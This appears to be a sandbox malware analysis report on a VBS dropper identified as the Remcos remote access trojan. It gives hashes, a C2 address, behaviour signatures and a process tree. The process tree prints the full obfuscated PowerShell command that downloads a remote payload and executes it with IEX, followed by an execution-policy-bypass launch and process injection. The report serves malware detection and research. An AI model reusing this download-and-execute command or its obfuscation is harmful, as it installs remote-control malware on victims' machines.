Overview

overview

10

Static

static

Appraisal1...00.vbs

windows7_x64

10

Appraisal1...00.vbs

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-04-2021 06:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisal11002275444900.vbs

  • Size

    662B

  • MD5

    8da164753530662b1f603f7b23413223

  • SHA1

    18a3665edcb3b3d3c53f9755bc225569a64ae642

  • SHA256

    b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388

  • SHA512

    b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0

Score
10/10
remcosrat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal11002275444900.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4076
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
          4⤵
            PID:2280
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            4⤵
              PID:2236
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              4⤵
                PID:2200
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                4⤵
                  PID:3916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                  4⤵
                    PID:200
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                    4⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:1808

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Privilege Escalation

            Defense Evasion

            Credential Access

            Discovery

            System Information Discovery

            1
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Public\ Microsoft.ps1
              MD5

              b5795726bb04f5f9584184ae1f50777b

              SHA1

              91b250e76c41066a009b70200c5254a40980228b

              SHA256

              5d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784

              SHA512

              10ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb

              Download Submit
            • memory/612-119-0x0000028BF04C0000-0x0000028BF04C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/612-123-0x0000028BF0D30000-0x0000028BF0D31000-memory.dmp
              Filesize

              4KB

              Download
            • memory/612-129-0x0000028BF0410000-0x0000028BF0412000-memory.dmp
              Filesize

              8KB

              Download
            • memory/612-130-0x0000028BF0413000-0x0000028BF0415000-memory.dmp
              Filesize

              8KB

              Download
            • memory/612-131-0x0000028BF0416000-0x0000028BF0418000-memory.dmp
              Filesize

              8KB

              Download
            • memory/612-114-0x0000000000000000-mapping.dmp
              Download
            • memory/1808-187-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1808-186-0x000000000042EEEF-mapping.dmp
              Download
            • memory/4076-136-0x0000000000000000-mapping.dmp
              Download
            • memory/4076-172-0x0000026FA5763000-0x0000026FA5765000-memory.dmp
              Filesize

              8KB

              Download
            • memory/4076-178-0x0000026FBE0C0000-0x0000026FBE0D8000-memory.dmp
              Filesize

              96KB

              Download
            • memory/4076-171-0x0000026FA5760000-0x0000026FA5762000-memory.dmp
              Filesize

              8KB

              Download
            • memory/4076-159-0x0000026FBE0F0000-0x0000026FBE0F1000-memory.dmp
              Filesize

              4KB

              Download